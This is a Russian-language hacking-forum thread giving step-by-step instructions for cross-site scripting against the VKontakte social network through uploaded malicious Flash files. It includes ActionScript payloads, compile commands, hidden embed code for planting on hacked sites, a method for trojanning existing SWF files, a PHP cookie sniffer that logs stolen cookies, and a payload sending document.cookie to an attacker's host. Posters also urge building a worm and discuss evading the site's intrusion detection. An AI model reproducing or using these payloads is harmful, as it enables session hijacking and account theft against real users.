Качаем mtask (http://tech.motion-twin.com/zip/mtasc-1.12.zip)
Создаём файлик hek.as с содержанием
class hek{
function hek() {
}

static function main(mc) {
getURL("javascript:alert(document.cookie);");
}
}
Далее компилим
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as
В настройках делаем доступным сервис "Приложения", обзываем его как-нить и заливаем наш скомпиленный hek.swf +)
Смотрим созданное "приложение" и выдираем ссылку на swf

...
<script type="text/javascript">
//<![CDATA[
var so = new SWFObject('evil_swf_on_vk','player',"1","1",'9');
so.addParam("allowfullscreen","false");
so.addParam("allownetworking", "all");
...
вот собственно и всё) кодес можно любой

Применение:
1) Можно вставить в сорц похэканного сайта кодес

<u style="display:none">
<embed src="evil_swf_on_vk" width="1" height="1" type="application/x-shockwave-flash"></embed>
</u>

и кинуть ссылку жертве)

2) Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools (http://www.swftools.org/swftools-0.7.0.exe)
Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump
swfdump.exe hek.swf
компилим с нужными параметрами злобнокодес (а именно меняем флаг -header)
mtasc.exe -swf hek.swf -main -header x:y:z hek.as
x и y - размеры, z - частота кадров в секунду
и вживляем
swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf

Демо с алертом (http://cs1232.vkontakte.ru/u10437821/swf/8152e109c5.swf)

Ссылки по теме:
http://tech.motion-twin.com/zip/mtasc-1.12.zip
http://www.swftools.org/swftools-0.7.0.exe

Фига Тох :)
+5

Авторегер есть, спамилка по id есть, теперь и ксс есть. Хуярьте товарищи червя... ;)

Или я непохеккер или оно не работает. Алерты все на ура, но при добавлении конструкций типа:
javascript:eval(String.fromCharCode(bla-bla-bla))
выплёвывает содержимое bla-bla-bla, где bla-bla-bla - енто закодированная хрень:
img=new Image(); img.src="http://гаткей_снеффер.gif?"+document.cookie;

Ха....ништяк, молодец

sniffer.php
<?
$ref = $_SERVER['HTTP_REFERER'];
$infa = $_SERVER['REMOTE_ADDR'];
$infa .= " : ";
$infa .= $_GET['s'];
$infa .= "\r\n\r\n";
$f=fopen("log.txt","a+");
fputs($f,$infa);
fclose($f);
Header("Location: http://www.vkontakte.ru"); //.$ref);
?>

attack.swf
getURL("javascript:location.href=\"http://yourhost/sniffer.php?s=\"+document.cookie;");

Может я не фтыкнул чет, но...когда вручную заходишь на демку
то куки норм, а если через сайт подставной...т.е. кодом, то приходит

__utma=52566834.124252957.1203944691.1203944691.12 06562305.2;%20__utmz=52566834.1203944691.1.1.utmcc n=(direct)|utmcsr=(direct)|utmcmd=(none);%20__utmb =52566834;%20__utmc=52566834;%20jcpu=1;%20pcnt=4;% 20pcls=1

Все очень просто. Если вы делаете embed то получаете куки своего сайта. А если делать iframe то будут куки vkontakte

Swf у меня не вызывается через ифрейм

гм у меня на опере вызывается

Проверил, только опера уважает ифрейм, остальные так не хотят
=

ну значит надо сделать красивую флешку и давать ссылку на нее

Так тоже не получиться, потому что заголовок не дает прогрузиться, Тохег объяснил где и как ты её испытывал?

Эм... перепроверьте..
Фикс или я криворукий?
ПРи первом переходе на свой свф показываются иероглифы...дальше уже 404

Фикс, буквально на 2-ой день. Свф с вредным кодом удаляется сразу

этож п*ц какая идс-ка там наверно стоит )

Имхо в идске есть баги и можно как-то криптануть наш код.......

Спустил в связи с https://forum.antichat.ru/threadedpost718472.html

не актуально, заметил, что у каждого пользователя своя ссылка на флэшку

Далее компилим Код: mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as

Обьясните пожалуйста как и что компилить, если можно по подробней. :confused: :confused: :confused:

Обьясните пожалуйста как и что компилить, если можно по подробней. :confused: :confused: :confused:
В строку Выполнить введи это) Только введи полный адрес до mtask.exe

Ну прописал полный путь к mtask.exe - не получилось (результат нигде не появился)
Пробывал полный путь ко всем файлвам - не получилось (результат нигде не появился)
Как тогда компилить?
И скажите: это еще актуально?

Создай 1.bat , в каталоге с mtask.exe , и в батник впиши ету строчку ....
Запусти ....

mtask - это трой?

Откомпелировал, загрузил... Я так понял он ворует куки? Куда он его сохраняет..?

Создай 1.bat , в каталоге с mtask.exe , и в батник впиши ету строчку ....
Запусти ....
Все равно ничего не получилось((

Все равно ничего не получилось((
у меня была такая проблемма, когда сам код написан неправильно в hek.as

а так, тут всё понятно:
залей на диск программу, создай батник и впиши, то что в 1 посте.

в соседней теме говорят убрали XSS... :mad:

Да, прикрыли сегодня.

Качаем mtask (http://tech.motion-twin.com/zip/mtasc-1.12.zip)
Создаём файлик hek.as с содержанием
class hek{
function hek() {
}

static function main(mc) {
getURL("javascript:alert(document.cookie);");
}
}
Далее компилим
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as
В настройках делаем доступным сервис "Приложения", обзываем его как-нить и заливаем наш скомпиленный hek.swf +)
Смотрим созданное "приложение" и выдираем ссылку на swf

...
<script type="text/javascript">
//<![CDATA[
var so = new SWFObject('evil_swf_on_vk','player',"1","1",'9');
so.addParam("allowfullscreen","false");
so.addParam("allownetworking", "all");
...
вот собственно и всё) кодес можно любой

Применение:
1) Можно вставить в сорц похэканного сайта кодес

<u style="display:none">
<embed src="evil_swf_on_vk" width="1" height="1" type="application/x-shockwave-flash"></embed>
</u>

и кинуть ссылку жертве)

Ссылки по теме:
http://tech.motion-twin.com/zip/mtasc-1.12.zip
http://www.swftools.org/swftools-0.7.0.exe

---
а почему бы не попробовать на mail.ru по крайней мере в опере олерты вылетают.
----
ваш злостный флудер xcedz ^_^